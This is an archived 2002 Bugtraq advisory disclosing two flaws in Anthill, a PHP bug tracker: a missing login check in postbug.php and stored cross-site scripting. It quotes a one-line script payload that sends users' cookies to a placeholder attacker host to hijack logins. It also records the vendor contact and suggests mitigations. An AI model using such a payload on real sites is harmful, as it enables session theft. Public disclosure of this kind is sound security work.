Anthill login and JavaScript vulnerabilities

From: Ulf Harnhammar (ulfh@update.uu.se)
Date: 04/06/02 

Date: Sat, 6 Apr 2002 19:16:17 +0200 (CEST)
From: Ulf Harnhammar <ulfh@update.uu.se>
To: bugtraq@securityfocus.com

Anthill login and JavaScript vulnerabilities

PROGRAM: Anthill
VENDOR: Vincent Danen (vdanen@mandrakesoft.com)
HOMEPAGE: http://anthill.vmlinuz.ca/
VULNERABLE VERSIONS: all
TYPE: remote
SEVERITY: high

DESCRIPTION:

"Anthill is a bug tracking database system written in PHP. It provides the
standard bug tracking features such as: user logins, summary reports,
submitting bugs, querying bugs, various severity and status levels. It also
provides some unique features, such as a template system, and multi-lingual
support."
(direct quote from the program's project page at Freshmeat)

Anthill was written because the vendor felt that Bugzilla was too complex.
It is published under the terms of the GNU General Public License. The program
is used by the MandrakeSoft Secteam, among others.

ISSUES:

1) New bugs are entered by accessing the script enterbug.php. It POSTs the
data to the script postbug.php, which stores it in the database. enterbug.php
checks if you're logged in, but postbug.php does not. This means that people
without accounts can enter new bugs in the system, by creating an HTML
document like the ones that enterbug.php displays (the same field names, the
same action attribute) and then simply accessing that HTML document locally.

2) Almost everywhere in the program, HTML code is stored and displayed without
any interference. This makes it easy for one user to add JavaScript code that
will be executed by another user. One of the authentication methods supported
is based on cookies. If that method is used, a malicious user may enter a
short JavaScript snippet like:

<script>self.location.href="http://www.evilsite.com/evil?"+escape(document.
cookie)</script>

to steal other people's cookies with their login information.

COMMUNICATION WITH VENDOR:

The vendor was contacted, first on the 16th of March, and then on the 1st of
April. He realizes that these bugs affect the program's security, but he
doesn't have the time to fix them, since this is just a hobby project that he
doesn't get paid for. (Hmm.. I wonder if Richard Stallman or Linus Torvalds
ever thought that way.)

RECOMMENDATION:

No fixed version is currently available. I recommend that all administrators
use their web servers' authentication/access control facilities in their
Anthill directories to keep strangers away, or that they simply change to
some better program.

// Ulf Harnhammar
ulfh@update.uu.se

Relevant Pages

  • Re: Bizarre...
    ... As featured on the Unseen University computer "Hex": the sticker 'Anthill ... "It'll work better if we can get some more bugs inside it" ...
    (alt.fan.harry-potter)
  • Re: OReilly interview with Date
    ... the implementation could be moved down into the server (using an ... > create table Bugs( ... > Reporter int references Users, ... column login ...
    (comp.databases.theory)
  • Re: What does it mean: if (a=b)
    ... if you get into the habit of doing that then you'll expect ... any bugs are more likely to be localised. ... Javascript however has no way to declare a constant name, ... What you can do with Javascript is run it through jslint and then you'll ...
    (comp.lang.javascript)
  • Re: Question: XMLHttpRequest
    ... Georg is not repeating himself, and since there is no equivalent to his code ... I completely understand people's fear and/or distrust of open source ... hours in your project to work out the bugs. ... Prototype.js was written by people who don't know javascript for people ...
    (comp.lang.javascript)
  • Re: Browser Detection Article
    ... current bugs tickets? ... It was the first "widget" written for My ... JavaScript is the name of the language. ...
    (comp.lang.javascript)